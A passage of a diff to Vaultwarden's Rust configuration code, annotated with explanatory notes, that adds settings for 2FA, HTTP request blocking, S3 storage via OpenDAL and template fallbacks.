+        /// Defaults to once every minute. Set blank to disable this job.
+        duo_context_purge_schedule: String, false, def, "30 * * * * *".to_string();
     },

     /// General settings
@@ -464,7 +507,8 @@ make_config! {
         disable_icon_download: bool, true, def, false;
         /// Allow new signups |> Controls whether new users can register. Users can be invited by the vaultwarden admin even if this is disabled
         signups_allowed: bool, true, def, true;
-        /// Require email verification on signups. This will prevent logins from succeeding until the address has been verified
+        /// Require email verification on signups. On new client versions, this will require verification at signup time. On older clients,
+        /// this will prevent logins from succeeding until the address has been verified
         signups_verify: bool, true, def, false;
         /// If signups require email verification, automatically re-send verification email if it hasn't been sent for a while (in seconds)
         signups_verify_resend_time: u64, true, def, 3_600;
@@ -489,11 +533,11 @@ make_config! {
         /// Password iterations |> Number of server-side passwords hashing iterations for the password hash.
         /// The default for new users. If changed, it will be updated during login for existing users.
         password_iterations: i32, true, def, 600_000;
-        /// Allow password hints |> Controls whether users can set password hints. This setting applies globally to all users.
+        /// Allow password hints |> Controls whether users can set or show password hints. This setting applies globally to all users.
         password_hints_allowed: bool, true, def, true;
-        /// Show password hint |> Controls whether a password hint should be shown directly in the web page
-        /// if SMTP service is not configured. Not recommended for publicly-accessible instances as this
-        /// provides unauthenticated access to potentially sensitive data.
+        /// Show password hint (Know the risks!) |> Controls whether a password hint should be shown directly in the web page
+        /// if SMTP service is not configured and password hints are allowed. Not recommended for publicly-accessible instances
+        /// because this provides unauthenticated access to potentially sensitive data.
         show_password_hint: bool, true, def, false;

         /// Admin token/Argon2 PHC |> The plain text token or Argon2 PHC string used to authenticate in this very same page. Changing it here will not deauthorize the current session!
@@ -512,7 +556,7 @@ make_config! {
         /// Set to the string "none" (without quotes), to disable any headers and just use the remote IP
         ip_header: String, true, def, "X-Real-IP".to_string();
         /// Internal IP header property, used to avoid recomputing each time
-        _ip_header_enabled: bool, false, gen, |c| &c.ip_header.trim().to_lowercase() != "none";
+        _ip_header_enabled: bool, false, generated, |c| &c.ip_header.trim().to_lowercase() != "none";
         /// Icon service |> The predefined icon services are: internal, bitwarden, duckduckgo, google.
         /// To specify a custom icon service, set a URL template with exactly one instance of `{}`,
         /// which is replaced with the domain. For example: `https://icon.example.com/domain/{}`.
@@ -521,9 +565,9 @@ make_config! {
         /// corresponding icon at the external service.
         icon_service: String, false, def, "internal".to_string();
         /// _icon_service_url
-        _icon_service_url: String, false, gen, |c| generate_icon_service_url(&c.icon_service);
+        _icon_service_url: String, false, generated, |c| generate_icon_service_url(&c.icon_service);
         /// _icon_service_csp
-        _icon_service_csp: String, false, gen, |c| generate_icon_service_csp(&c.icon_service, &c._icon_service_url);
+        _icon_service_csp: String, false, generated, |c| generate_icon_service_csp(&c.icon_service, &c._icon_service_url);
         /// Icon redirect code |> The HTTP status code to use for redirects to an external icon service.
         /// The supported codes are 301 (legacy permanent), 302 (legacy temporary), 307 (temporary), and 308 (permanent).
         /// Temporary redirects are useful while testing different icon services, but once a service
@@ -536,12 +580,18 @@ make_config! {
         icon_cache_negttl: u64, true, def, 259_200;
         /// Icon download timeout |> Number of seconds when to stop attempting to download an icon.
         icon_download_timeout: u64, true, def, 10;
-        /// Icon blacklist Regex |> Any domains or IPs that match this regex won't be fetched by the icon service.
+
+        /// [Deprecated] Icon blacklist Regex |> Use `http_request_block_regex` instead
+        icon_blacklist_regex: String, false, option;
+        /// [Deprecated] Icon blacklist non global IPs |> Use `http_request_block_non_global_ips` instead
+        icon_blacklist_non_global_ips: bool, false, def, true;
+
+        /// Block HTTP domains/IPs by Regex |> Any domains or IPs that match this regex won't be fetched by the internal HTTP client.
         /// Useful to hide other servers in the local network. Check the WIKI for more details
-        icon_blacklist_regex: String, true, option;
-        /// Icon blacklist non global IPs |> Any IP which is not defined as a global IP will be blacklisted.
+        http_request_block_regex: String, true, option;
+        /// Block non global IPs |> Enabling this will cause the internal HTTP client to refuse to connect to any non global IP address.
         /// Useful to secure your internal environment: See https://en.wikipedia.org/wiki/Reserved_IP_addresses for a list of IPs which it will block
-        icon_blacklist_non_global_ips: bool, true, def, true;
+        http_request_block_non_global_ips: bool, true, auto, |c| c.icon_blacklist_non_global_ips;

         /// Disable Two-Factor remember |> Enabling this would force the users to use a second factor to login every time.
         /// Note that the checkbox would still be present, but ignored.
@@ -552,7 +602,7 @@ make_config! {
         authenticator_disable_time_drift: bool, true, def, false;

         /// Customize the enabled feature flags on the clients |> This is a comma separated list of feature flags to enable.
-        experimental_client_feature_flags: String, false, def, "fido2-vault-credentials".to_string();
+        experimental_client_feature_flags: String, false, def, String::new();

         /// Require new device emails |> When a user logs in an email is required to be sent.
         /// If sending the email fails the login attempt will fail.
@@ -569,8 +619,9 @@ make_config! {
         use_syslog: bool, false, def, false;
         /// Log file path
         log_file: String, false, option;
-        /// Log level
-        log_level: String, false, def, "Info".to_string();
+        /// Log level |> Valid values are "trace", "debug", "info", "warn", "error" and "off"
+        /// For a specific module append it as a comma separated value "info,path::to::module=debug"
+        log_level: String, false, def, "info".to_string();

         /// Enable DB WAL |> Turning this off might lead to worse performance, but might help if using vaultwarden on some exotic filesystems,
         /// that do not support WAL. Please make sure you read project wiki on the topic before changing this setting.
@@ -594,6 +645,9 @@ make_config! {
         /// Allowed iframe ancestors (Know the risks!) |> Allows other domains to embed the web vault into an iframe, useful for embedding into secure intranets
         allowed_iframe_ancestors: String, true, def, String::new();

+        /// Allowed connect-src (Know the risks!) |> Allows other domains to URLs which can be loaded using script interfaces like the Forwarded email alias feature
+        allowed_connect_src: String, true, def, String::new();
+
         /// Seconds between login requests |> Number of seconds, on average, between login and 2FA requests from the same IP address before rate limiting kicks in
         login_ratelimit_seconds: u64, false, def, 60;
         /// Max burst size for login requests |> Allow a burst of requests of up to this size, while maintaining the average indicated by `login_ratelimit_seconds`. Note that this applies to both the login and the 2FA, so it's recommended to allow a burst size of at least 2
@@ -608,7 +662,18 @@ make_config! {
         admin_session_lifetime: i64, true, def, 20;

         /// Enable groups (BETA!) (Know the risks!) |> Enables groups support for organizations (Currently contains known issues!).
         org_groups_enabled: bool, false, def, false;
+
+        /// Increase note size limit (Know the risks!) |> Sets the secure note size limit to 100_000 instead of the default 10_000.
+        /// WARNING: This could cause issues with clients. Also exports will not work on Bitwarden servers!
+        increase_note_size_limit: bool, true, def, false;
+        /// Generated max_note_size value to prevent if..else matching during every check
+        _max_note_size: usize, false, generated, |c| if c.increase_note_size_limit {100_000} else {10_000};
+
+        /// Enforce Single Org with Reset Password Policy |> Enforce that the Single Org policy is enabled before setting the Reset Password policy
+        /// Bitwarden enforces this by default. In Vaultwarden we encouraged to use multiple organizations because groups were not available.
+        /// Setting this to true will enforce the Single Org Policy to be enabled before you can enable the Reset Password policy.
+        enforce_single_org_with_reset_pw_policy: bool, false, def, false;
     },

     /// Yubikey settings
@@ -627,9 +692,11 @@ make_config! {
     duo: _enable_duo {
         /// Enabled
         _enable_duo: bool, true, def, true;
-        /// Integration Key
+        /// Attempt to use deprecated iframe-based Traditional Prompt (Duo WebSDK 2)
+        duo_use_iframe: bool, false, def, false;
+        /// Client Id
         duo_ikey: String, true, option;
-        /// Secret Key
+        /// Client Secret
         duo_skey: Pass, true, option;
         /// Host
         duo_host: String, true, option;
@@ -644,7 +711,7 @@ make_config! {
         /// Use Sendmail |> Whether to send mail via the `sendmail` command
         use_sendmail: bool, true, def, false;
         /// Sendmail Command |> Which sendmail command to use. The one found in the $PATH is used if not specified.
-        sendmail_command: String, true, option;
+        sendmail_command: String, false, option;
         /// Host
         smtp_host: String, true, option;
         /// DEPRECATED smtp_ssl |> DEPRECATED - Please use SMTP_SECURITY
@@ -672,7 +739,7 @@ make_config! {
         /// Embed images as email attachments.
         smtp_embed_images: bool, true, def, true;
         /// _smtp_img_src
-        _smtp_img_src: String, false, gen, |c| generate_smtp_img_src(c.smtp_embed_images, &c.domain);
+        _smtp_img_src: String, false, generated, |c| generate_smtp_img_src(c.smtp_embed_images, &c.domain);
         /// Enable SMTP debugging (Know the risks!) |> DANGEROUS: Enabling this will output very detailed SMTP messages. This could contain sensitive information like passwords and usernames! Only enable this during troubleshooting!
         smtp_debug: bool, false, def, false;
         /// Accept Invalid Certs (Know the risks!) |> DANGEROUS: Allow invalid certificates. This option introduces significant vulnerabilities to man-in-the-middle attacks!
@@ -691,6 +758,10 @@ make_config! {
         email_expiration_time: u64, true, def, 600;
         /// Maximum attempts |> Maximum attempts before an email token is reset and a new email will need to be sent
         email_attempts_limit: u64, true, def, 3;
+        /// Setup email 2FA at signup |> Setup email 2FA provider on registration regardless of any organization policy
+        email_2fa_enforce_on_verified_invite: bool, true, def, false;
+        /// Auto-enable 2FA (Know the risks!) |> Automatically setup email 2FA as fallback provider when needed
+        email_2fa_auto_fallback: bool, true, def, false;
     },
 }

@@ -728,6 +799,13 @@ fn validate_config(cfg: &ConfigItems) -> Result<(), Error> {
         );
     }

+    let connect_src = cfg.allowed_connect_src.to_lowercase();
+    for url in connect_src.split_whitespace() {
+        if !url.starts_with("https://") || Url::parse(url).is_err() {
+            err!("ALLOWED_CONNECT_SRC variable contains one or more invalid URLs. Only FQDN's starting with https are allowed");
+        }
+    }
+
     let whitelist = &cfg.signups_domains_whitelist;
     if !whitelist.is_empty() && whitelist.split(',').any(|d| d.trim().is_empty()) {
         err!("`SIGNUPS_DOMAINS_WHITELIST` contains empty tokens");
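The new `ALLOWED_CONNECT_SRC` check accepts a whitespace-separated list and requires each entry to be an https URL that `Url::parse` accepts. Standalone, the validation rule looks roughly like this, using the `url` crate that reqwest re-exports as `reqwest::Url`:

    use url::Url;

    // Sketch of the ALLOWED_CONNECT_SRC validation rule.
    fn validate_connect_src(list: &str) -> Result<(), String> {
        for entry in list.to_lowercase().split_whitespace() {
            if !entry.starts_with("https://") || Url::parse(entry).is_err() {
                return Err(format!("invalid connect-src entry: {entry}"));
            }
        }
        Ok(())
    }

    fn main() {
        assert!(validate_connect_src("https://api.example.com").is_ok());
        assert!(validate_connect_src("http://plain.example.com").is_err());
    }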
@@ -778,9 +856,26 @@ fn validate_config(cfg: &ConfigItems) -> Result<(), Error> {
         }
     }

-    // TODO: deal with deprecated flags so they can be removed from this list, cf. #4263
-    const KNOWN_FLAGS: &[&str] =
-        &["autofill-overlay", "autofill-v2", "browser-fileless-import", "fido2-vault-credentials"];
+    // Server (v2025.6.2): https://github.com/bitwarden/server/blob/d094be3267f2030bd0dc62106bc6871cf82682f5/src/Core/Constants.cs#L103
+    // Client (web-v2025.6.1): https://github.com/bitwarden/clients/blob/747c2fd6a1c348a57a76e4a7de8128466ffd3c01/libs/common/src/enums/feature-flag.enum.ts#L12
+    // Android (v2025.6.0): https://github.com/bitwarden/android/blob/b5b022caaad33390c31b3021b2c1205925b0e1a2/app/src/main/kotlin/com/x8bit/bitwarden/data/platform/manager/model/FlagKey.kt#L22
+    // iOS (v2025.6.0): https://github.com/bitwarden/ios/blob/ff06d9c6cc8da89f78f37f376495800201d7261a/BitwardenShared/Core/Platform/Models/Enum/FeatureFlag.swift#L7
+    //
+    // NOTE: Move deprecated flags to the utils::parse_experimental_client_feature_flags() DEPRECATED_FLAGS const!
+    const KNOWN_FLAGS: &[&str] = &[
+        // Autofill Team
+        "inline-menu-positioning-improvements",
+        "inline-menu-totp",
+        "ssh-agent",
+        // Key Management Team
+        "ssh-key-vault-item",
+        // Tools
+        "export-attachments",
+        // Mobile Team
+        "anon-addy-self-host-alias",
+        "simple-login-self-host-alias",
+        "mutual-tls",
+    ];
     let configured_flags = parse_experimental_client_feature_flags(&cfg.experimental_client_feature_flags);
     let invalid_flags: Vec<_> = configured_flags.keys().filter(|flag| !KNOWN_FLAGS.contains(&flag.as_str())).collect();
     if !invalid_flags.is_empty() {
@@ -841,12 +936,12 @@ fn validate_config(cfg: &ConfigItems) -> Result<(), Error> {
         let command = cfg.sendmail_command.clone().unwrap_or_else(|| format!("sendmail{EXE_SUFFIX}"));

         let mut path = std::path::PathBuf::from(&command);
+        // Check if we can find the sendmail command to execute when no absolute path is given
         if !path.is_absolute() {
-            match which::which(&command) {
-                Ok(result) => path = result,
-                Err(_) => err!(format!("sendmail command {command:?} not found in $PATH")),
-            }
+            let Ok(which_path) = which::which(&command) else {
+                err!(format!("sendmail command {command} not found in $PATH"))
+            };
+            path = which_path;
         }

         match path.metadata() {
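`which::which` resolves a bare command name against `$PATH` and returns a `PathBuf`, which is what the rewritten sendmail check binds with let-else. In isolation, under the `which` crate:

    // Sketch: resolve a command on $PATH the way the sendmail check does.
    fn main() {
        match which::which("sendmail") {
            Ok(path) => println!("sendmail resolved to {}", path.display()),
            Err(_) => eprintln!("sendmail not found in $PATH"),
        }
    }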
@@ -880,8 +975,8 @@ fn validate_config(cfg: &ConfigItems) -> Result<(), Error> {
         }
     }

-    if (cfg.smtp_host.is_some() || cfg.use_sendmail) && !cfg.smtp_from.contains('@') {
-        err!("SMTP_FROM does not contain a mandatory @ sign")
+    if (cfg.smtp_host.is_some() || cfg.use_sendmail) && !is_valid_email(&cfg.smtp_from) {
+        err!(format!("SMTP_FROM '{}' is not a valid email address", cfg.smtp_from))
     }

     if cfg._enable_email_2fa && cfg.email_token_size < 6 {
@@ -893,12 +988,19 @@ fn validate_config(cfg: &ConfigItems) -> Result<(), Error> {
         err!("To enable email 2FA, a mail transport must be configured")
     }

-    // Check if the icon blacklist regex is valid
-    if let Some(ref r) = cfg.icon_blacklist_regex {
+    if !cfg._enable_email_2fa && cfg.email_2fa_enforce_on_verified_invite {
+        err!("To enforce email 2FA on verified invitations, email 2fa has to be enabled!");
+    }
+    if !cfg._enable_email_2fa && cfg.email_2fa_auto_fallback {
+        err!("To use email 2FA as automatic fallback, email 2fa has to be enabled!");
+    }
+
+    // Check if the HTTP request block regex is valid
+    if let Some(ref r) = cfg.http_request_block_regex {
         let validate_regex = regex::Regex::new(r);
         match validate_regex {
             Ok(_) => (),
-            Err(e) => err!(format!("`ICON_BLACKLIST_REGEX` is invalid: {e:#?}")),
+            Err(e) => err!(format!("`HTTP_REQUEST_BLOCK_REGEX` is invalid: {e:#?}")),
         }
     }

@@ -978,6 +1080,11 @@ fn validate_config(cfg: &ConfigItems) -> Result<(), Error> {
             _ => {}
         }
     }
+
+    if cfg.increase_note_size_limit {
+        println!("[WARNING] Secure Note size limit is increased to 100_000!");
+        println!("[WARNING] This could cause issues with clients. Also exports will not work on Bitwarden servers!.");
+    }
     Ok(())
 }

@@ -1054,11 +1161,103 @@ fn smtp_convert_deprecated_ssl_options(smtp_ssl: Option<bool>, smtp_explicit_tls
     "starttls".to_string()
 }
 
+fn opendal_operator_for_path(path: &str) -> Result<opendal::Operator, Error> {
+    // Cache of previously built operators by path
+    static OPERATORS_BY_PATH: LazyLock<dashmap::DashMap<String, opendal::Operator>> =
+        LazyLock::new(dashmap::DashMap::new);
+
+    if let Some(operator) = OPERATORS_BY_PATH.get(path) {
+        return Ok(operator.clone());
+    }
+
+    let operator = if path.starts_with("s3://") {
+        #[cfg(not(s3))]
+        return Err(opendal::Error::new(opendal::ErrorKind::ConfigInvalid, "S3 support is not enabled").into());
+
+        #[cfg(s3)]
+        opendal_s3_operator_for_path(path)?
+    } else {
+        let builder = opendal::services::Fs::default().root(path);
+        opendal::Operator::new(builder)?.finish()
+    };
+
+    OPERATORS_BY_PATH.insert(path.to_string(), operator.clone());
+
+    Ok(operator)
+}
+
+#[cfg(s3)]
+fn opendal_s3_operator_for_path(path: &str) -> Result<opendal::Operator, Error> {
+    use crate::http_client::aws::AwsReqwestConnector;
+    use aws_config::{default_provider::credentials::DefaultCredentialsChain, provider_config::ProviderConfig};
+
+    // This is a custom AWS credential loader that uses the official AWS Rust
+    // SDK config crate to load credentials. This ensures maximum compatibility
+    // with AWS credential configurations. For example, OpenDAL doesn't support
+    // AWS SSO temporary credentials yet.
+    struct OpenDALS3CredentialLoader {}
+
+    #[async_trait]
+    impl reqsign::AwsCredentialLoad for OpenDALS3CredentialLoader {
+        async fn load_credential(&self, _client: reqwest::Client) -> anyhow::Result<Option<reqsign::AwsCredential>> {
+            use aws_credential_types::provider::ProvideCredentials as _;
+            use tokio::sync::OnceCell;
+
+            static DEFAULT_CREDENTIAL_CHAIN: OnceCell<DefaultCredentialsChain> = OnceCell::const_new();
+
+            let chain = DEFAULT_CREDENTIAL_CHAIN
+                .get_or_init(|| {
+                    let reqwest_client = reqwest::Client::builder().build().unwrap();
+                    let connector = AwsReqwestConnector {
+                        client: reqwest_client,
+                    };
+
+                    let conf = ProviderConfig::default().with_http_client(connector);
+
+                    DefaultCredentialsChain::builder().configure(conf).build()
+                })
+                .await;
+
+            let creds = chain.provide_credentials().await?;
+
+            Ok(Some(reqsign::AwsCredential {
+                access_key_id: creds.access_key_id().to_string(),
+                secret_access_key: creds.secret_access_key().to_string(),
+                session_token: creds.session_token().map(|s| s.to_string()),
+                expires_in: creds.expiry().map(|expiration| expiration.into()),
+            }))
+        }
+    }
+
+    const OPEN_DAL_S3_CREDENTIAL_LOADER: OpenDALS3CredentialLoader = OpenDALS3CredentialLoader {};
+
+    let url = Url::parse(path).map_err(|e| format!("Invalid path S3 URL path {path:?}: {e}"))?;
+
+    let bucket = url.host_str().ok_or_else(|| format!("Missing Bucket name in data folder S3 URL {path:?}"))?;
+
+    let builder = opendal::services::S3::default()
+        .customized_credential_load(Box::new(OPEN_DAL_S3_CREDENTIAL_LOADER))
+        .enable_virtual_host_style()
+        .bucket(bucket)
+        .root(url.path())
+        .default_storage_class("INTELLIGENT_TIERING");
+
+    Ok(opendal::Operator::new(builder)?.finish())
+}
+
+pub enum PathType {
+    Data,
+    IconCache,
+    Attachments,
+    Sends,
+    RsaKey,
+}
+
 impl Config {
-    pub fn load() -> Result<Self, Error> {
+    pub async fn load() -> Result<Self, Error> {
         // Loading from env and file
         let _env = ConfigBuilder::from_env();
-        let _usr = ConfigBuilder::from_file(&CONFIG_FILE).unwrap_or_default();
+        let _usr = ConfigBuilder::from_file().await.unwrap_or_default();
 
         // Create merged config, config file overwrites env
         let mut _overrides = Vec::new();
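The new `opendal_operator_for_path` memoizes operators because building one (especially the S3 variant with its credential chain) is comparatively expensive, while `opendal::Operator` itself is cheap to clone. A reduced sketch of that cache-by-key pattern, with a `String` standing in for the operator:

```rust
use std::sync::LazyLock;

// One process-wide map; dashmap shards its locks internally, so concurrent
// readers do not contend on a single mutex.
static CACHE: LazyLock<dashmap::DashMap<String, String>> = LazyLock::new(dashmap::DashMap::new);

fn cached_build(key: &str) -> String {
    if let Some(v) = CACHE.get(key) {
        return v.clone(); // cheap clone of the cached value
    }
    let value = format!("built-for-{key}"); // stands in for the expensive construction
    CACHE.insert(key.to_string(), value.clone());
    value
}
```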
@@ -1066,12 +1265,13 @@ impl Config {
 
         // Fill any missing with defaults
         let config = builder.build();
-        validate_config(&config)?;
+        if !SKIP_CONFIG_VALIDATION.load(Ordering::Relaxed) {
+            validate_config(&config)?;
+        }
 
         Ok(Config {
             inner: RwLock::new(Inner {
                 rocket_shutdown_handle: None,
-                ws_shutdown_handle: None,
                 templates: load_templates(&config.templates_folder),
                 config,
                 _env,
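`SKIP_CONFIG_VALIDATION` is defined elsewhere in the file; judging by its usage here it is a process-wide atomic flag that lets a caller skip re-validating a config it has already checked. A hypothetical sketch of that gate:

```rust
use std::sync::atomic::{AtomicBool, Ordering};

// Hypothetical: the real flag lives elsewhere in config.rs.
pub static SKIP_CONFIG_VALIDATION: AtomicBool = AtomicBool::new(false);

fn load_checked(validate: impl FnOnce() -> Result<(), String>) -> Result<(), String> {
    // Relaxed suffices: a standalone flag with no ordering dependencies.
    if !SKIP_CONFIG_VALIDATION.load(Ordering::Relaxed) {
        validate()?;
    }
    Ok(())
}
```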
@@ -1081,12 +1281,17 @@ impl Config {
         })
     }
 
-    pub fn update_config(&self, other: ConfigBuilder) -> Result<(), Error> {
+    pub async fn update_config(&self, other: ConfigBuilder, ignore_non_editable: bool) -> Result<(), Error> {
         // Remove default values
         //let builder = other.remove(&self.inner.read().unwrap()._env);
 
         // TODO: Remove values that are defaults, above only checks those set by env and not the defaults
-        let builder = other;
+        let mut builder = other;
+
+        // Remove values that are not editable
+        if ignore_non_editable {
+            builder.clear_non_editable();
+        }
 
         // Serialize now before we consume the builder
         let config_str = serde_json::to_string_pretty(&builder)?;
@@ -1108,20 +1313,19 @@ impl Config {
         }
 
         //Save to file
-        use std::{fs::File, io::Write};
-        let mut file = File::create(&*CONFIG_FILE)?;
-        file.write_all(config_str.as_bytes())?;
+        let operator = opendal_operator_for_path(&CONFIG_FILE_PARENT_DIR)?;
+        operator.write(&CONFIG_FILENAME, config_str).await?;
 
         Ok(())
     }
 
-    fn update_config_partial(&self, other: ConfigBuilder) -> Result<(), Error> {
+    async fn update_config_partial(&self, other: ConfigBuilder) -> Result<(), Error> {
         let builder = {
             let usr = &self.inner.read().unwrap()._usr;
             let mut _overrides = Vec::new();
             usr.merge(&other, false, &mut _overrides)
         };
-        self.update_config(builder)
+        self.update_config(builder, false).await
     }
 
     /// Tests whether an email's domain is allowed. A domain is allowed if it
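Saving the config now goes through the same OpenDAL operator abstraction as other storage, so the file can live on local disk or in an object store. A sketch of the write path, assuming an operator rooted at the config directory:

```rust
// Operator::write replaces the whole file/object with the given contents
// (creating it if missing), so no explicit create/truncate step is needed.
async fn save_config_json(op: &opendal::Operator, filename: &str, json: String) -> opendal::Result<()> {
    op.write(filename, json).await?;
    Ok(())
}
```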
@@ -1130,7 +1334,7 @@ impl Config {
     pub fn is_email_domain_allowed(&self, email: &str) -> bool {
         let e: Vec<&str> = email.rsplitn(2, '@').collect();
         if e.len() != 2 || e[0].is_empty() || e[1].is_empty() {
-            warn!("Failed to parse email address '{}'", email);
+            warn!("Failed to parse email address '{email}'");
             return false;
         }
         let email_domain = e[0].to_lowercase();
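A worked example of why `rsplitn(2, '@')` is the right split here: iterating from the right means only the final `@` separates the local part from the domain, so a local part containing `@` characters still yields the correct domain.

```rust
fn email_domain(email: &str) -> Option<String> {
    // rsplitn walks right-to-left: element 0 is the domain, element 1 the local part.
    let e: Vec<&str> = email.rsplitn(2, '@').collect();
    if e.len() != 2 || e[0].is_empty() || e[1].is_empty() {
        return None;
    }
    Some(e[0].to_lowercase())
}

// email_domain("user@sub@example.org") == Some("example.org".to_string())
```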
@@ -1163,8 +1367,9 @@ impl Config {
         }
     }
 
-    pub fn delete_user_config(&self) -> Result<(), Error> {
-        crate::util::delete_file(&CONFIG_FILE)?;
+    pub async fn delete_user_config(&self) -> Result<(), Error> {
+        let operator = opendal_operator_for_path(&CONFIG_FILE_PARENT_DIR)?;
+        operator.delete(&CONFIG_FILENAME).await?;
 
         // Empty user config
         let usr = ConfigBuilder::default();
@@ -1187,17 +1392,14 @@ impl Config {
     }
 
     pub fn private_rsa_key(&self) -> String {
-        format!("{}.pem", CONFIG.rsa_key_filename())
-    }
-    pub fn public_rsa_key(&self) -> String {
-        format!("{}.pub.pem", CONFIG.rsa_key_filename())
+        format!("{}.pem", self.rsa_key_filename())
     }
     pub fn mail_enabled(&self) -> bool {
         let inner = &self.inner.read().unwrap().config;
         inner._enable_smtp && (inner.smtp_host.is_some() || inner.use_sendmail)
     }
 
-    pub fn get_duo_akey(&self) -> String {
+    pub async fn get_duo_akey(&self) -> String {
         if let Some(akey) = self._duo_akey() {
             akey
         } else {
@@ -1208,7 +1410,7 @@ impl Config {
             _duo_akey: Some(akey_s.clone()),
             ..Default::default()
         };
-        self.update_config_partial(builder).ok();
+        self.update_config_partial(builder).await.ok();
 
         akey_s
     }
@@ -1221,35 +1423,45 @@ impl Config {
         token.is_some() && !token.unwrap().trim().is_empty()
     }
 
-    pub fn render_template<T: serde::ser::Serialize>(
-        &self,
-        name: &str,
-        data: &T,
-    ) -> Result<String, crate::error::Error> {
-        if CONFIG.reload_templates() {
+    pub fn opendal_operator_for_path_type(&self, path_type: PathType) -> Result<opendal::Operator, Error> {
+        let path = match path_type {
+            PathType::Data => self.data_folder(),
+            PathType::IconCache => self.icon_cache_folder(),
+            PathType::Attachments => self.attachments_folder(),
+            PathType::Sends => self.sends_folder(),
+            PathType::RsaKey => std::path::Path::new(&self.rsa_key_filename())
+                .parent()
+                .ok_or_else(|| std::io::Error::other("Failed to get directory of RSA key file"))?
+                .to_str()
+                .ok_or_else(|| std::io::Error::other("Failed to convert RSA key file directory to UTF-8 string"))?
+                .to_string(),
+        };
+
+        opendal_operator_for_path(&path)
+    }
+
+    pub fn render_template<T: serde::ser::Serialize>(&self, name: &str, data: &T) -> Result<String, Error> {
+        if self.reload_templates() {
             warn!("RELOADING TEMPLATES");
             let hb = load_templates(CONFIG.templates_folder());
             hb.render(name, data).map_err(Into::into)
         } else {
-            let hb = &CONFIG.inner.read().unwrap().templates;
+            let hb = &self.inner.read().unwrap().templates;
             hb.render(name, data).map_err(Into::into)
         }
     }
 
+    pub fn render_fallback_template<T: serde::ser::Serialize>(&self, name: &str, data: &T) -> Result<String, Error> {
+        let hb = &self.inner.read().unwrap().templates;
+        hb.render(&format!("fallback_{name}"), data).map_err(Into::into)
+    }
+
     pub fn set_rocket_shutdown_handle(&self, handle: rocket::Shutdown) {
         self.inner.write().unwrap().rocket_shutdown_handle = Some(handle);
     }
 
-    pub fn set_ws_shutdown_handle(&self, handle: tokio::sync::oneshot::Sender<()>) {
-        self.inner.write().unwrap().ws_shutdown_handle = Some(handle);
-    }
-
     pub fn shutdown(&self) {
         if let Ok(mut c) = self.inner.write() {
-            if let Some(handle) = c.ws_shutdown_handle.take() {
-                handle.send(()).ok();
-            }
-
             if let Some(handle) = c.rocket_shutdown_handle.take() {
                 handle.notify();
             }
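The new `render_fallback_template` relies on every built-in template also being registered under a `fallback_` prefix, so a built-in copy can still render even when a user override replaces (or breaks) the normal name. A sketch of that double registration:

```rust
fn register_with_fallback(hb: &mut handlebars::Handlebars<'_>, name: &str, tpl: &str) {
    // Normal name: may later be overwritten by a user template loaded from disk.
    hb.register_template_string(name, tpl).unwrap();
    // Prefixed name: always resolves to the built-in copy.
    hb.register_template_string(&format!("fallback_{name}"), tpl).unwrap();
}
```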
@@ -1271,8 +1483,9 @@ where
     hb.set_strict_mode(true);
     // Register helpers
    hb.register_helper("case", Box::new(case_helper));
-    hb.register_helper("jsesc", Box::new(js_escape_helper));
     hb.register_helper("to_json", Box::new(to_json));
+    hb.register_helper("webver", Box::new(webver));
+    hb.register_helper("vwver", Box::new(vwver));
 
     macro_rules! reg {
         ($name:expr) => {{
@@ -1283,6 +1496,11 @@ where
             reg!($name);
             reg!(concat!($name, $ext));
         }};
+        (@withfallback $name:expr) => {{
+            let template = include_str!(concat!("static/templates/", $name, ".hbs"));
+            hb.register_template_string($name, template).unwrap();
+            hb.register_template_string(concat!("fallback_", $name), template).unwrap();
+        }};
     }
 
     // First register default templates here
@@ -1291,6 +1509,7 @@ where
     reg!("email/email_footer_text");
 
     reg!("email/admin_reset_password", ".html");
+    reg!("email/change_email_existing", ".html");
     reg!("email/change_email", ".html");
     reg!("email/delete_account", ".html");
     reg!("email/emergency_access_invite_accepted", ".html");
@@ -1307,6 +1526,7 @@ where
     reg!("email/protected_action", ".html");
     reg!("email/pw_hint_none", ".html");
     reg!("email/pw_hint_some", ".html");
+    reg!("email/register_verify_email", ".html");
     reg!("email/send_2fa_removed_from_org", ".html");
     reg!("email/send_emergency_access_invite", ".html");
     reg!("email/send_org_invite", ".html");
@@ -1326,17 +1546,13 @@ where
 
     reg!("404");
 
+    reg!(@withfallback "scss/vaultwarden.scss");
+    reg!("scss/user.vaultwarden.scss");
+
     // And then load user templates to overwrite the defaults
     // Use .hbs extension for the files
     // Templates get registered with their relative name
-    hb.register_templates_directory(
-        path,
-        DirectorySourceOptions {
-            tpl_extension: ".hbs".to_owned(),
-            ..Default::default()
-        },
-    )
-    .unwrap();
+    hb.register_templates_directory(path, DirectorySourceOptions::default()).unwrap();
 
     hb
 }
@@ -1359,32 +1575,6 @@ fn case_helper<'reg, 'rc>(
     }
 }
 
-fn js_escape_helper<'reg, 'rc>(
-    h: &Helper<'rc>,
-    _r: &'reg Handlebars<'_>,
-    _ctx: &'rc Context,
-    _rc: &mut RenderContext<'reg, 'rc>,
-    out: &mut dyn Output,
-) -> HelperResult {
-    let param =
-        h.param(0).ok_or_else(|| RenderErrorReason::Other(String::from("Param not found for helper \"jsesc\"")))?;
-
-    let no_quote = h.param(1).is_some();
-
-    let value = param
-        .value()
-        .as_str()
-        .ok_or_else(|| RenderErrorReason::Other(String::from("Param for helper \"jsesc\" is not a String")))?;
-
-    let mut escaped_value = value.replace('\\', "").replace('\'', "\\x22").replace('\"', "\\x27");
-    if !no_quote {
-        escaped_value = format!("&quot;{escaped_value}&quot;");
-    }
-
-    out.write(&escaped_value)?;
-    Ok(())
-}
-
 fn to_json<'reg, 'rc>(
     h: &Helper<'rc>,
     _r: &'reg Handlebars<'_>,
@@ -1401,3 +1591,42 @@ fn to_json<'reg, 'rc>(
     out.write(&json)?;
     Ok(())
 }
+
+// Configure the web-vault version as an integer so it can be used as a comparison smaller or greater then.
+// The default is based upon the version since this feature is added.
+static WEB_VAULT_VERSION: Lazy<semver::Version> = Lazy::new(|| {
+    let vault_version = get_web_vault_version();
+    // Use a single regex capture to extract version components
+    let re = regex::Regex::new(r"(\d{4})\.(\d{1,2})\.(\d{1,2})").unwrap();
+    re.captures(&vault_version)
+        .and_then(|c| {
+            (c.len() == 4).then(|| {
+                format!("{}.{}.{}", c.get(1).unwrap().as_str(), c.get(2).unwrap().as_str(), c.get(3).unwrap().as_str())
+            })
+        })
+        .and_then(|v| semver::Version::parse(&v).ok())
+        .unwrap_or_else(|| semver::Version::parse("2024.6.2").unwrap())
+});
+
+// Configure the Vaultwarden version as an integer so it can be used as a comparison smaller or greater then.
+// The default is based upon the version since this feature is added.
